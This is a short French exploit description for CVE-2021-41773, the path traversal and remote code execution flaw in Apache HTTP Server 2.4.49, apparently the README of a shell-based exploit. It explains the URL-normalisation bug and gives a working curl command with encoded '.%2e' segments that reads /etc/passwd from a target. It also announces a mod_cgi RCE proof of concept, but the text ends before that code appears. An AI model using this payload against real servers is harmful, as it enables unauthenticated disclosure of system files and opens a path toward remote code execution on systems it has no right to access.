
Exploit basé sur shell pour CVE-2021-41773 ciblant la vulnérabilité de traversée de chemin du serveur HTTP Apache, permettant la divulgation de fichiers distants non authentifiée et une exécution de code potentielle.
CVE-2021-41773 | Apache HTTP Server 2.4.49 Path Traversal & RCE
Cette vulnérabilité permet le Path Traversal et l'exécution de code à distance (RCE) sur Apache HTTP Server 2.4.49. Le bug est causé par un défaut dans le processus de normalisation des chemins, qui permet à un attaquant de contourner la normalisation des URL et d'accéder à des fichiers en dehors des répertoires autorisés.
Aucun prérequis particulier. Juste un serveur Apache HTTP Server 2.4.49 vulnérable + curl.
Path Traversal :
Le Path Traversal s'effectue à l'aide de curl :
curl -v --path-as-is http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
RCE (Exécution de code à distance) :
Pour exécuter des commandes via mod_cgi, il suffit d'activer le module CGI et d'utiliser le PoC suivant.